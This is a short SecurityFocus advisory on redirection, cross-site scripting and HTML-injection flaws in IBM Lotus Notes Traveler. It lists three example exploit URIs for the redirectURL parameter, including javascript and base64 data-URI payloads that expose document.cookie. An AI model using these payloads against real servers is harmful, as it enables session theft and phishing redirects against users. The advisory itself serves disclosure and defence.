IBM Lotus Notes Traveler Multiple Input Validation Vulnerabilities

An attacker must trick an unsuspecting victim into following a malicious URI to exploit the URI redirection and cross-site scripting issues. An attacker can exploit the HTML-injection issues through a browser.

The following example URIs are available:

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie)

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua


 

Privacy Statement
Copyright 2010, SecurityFocus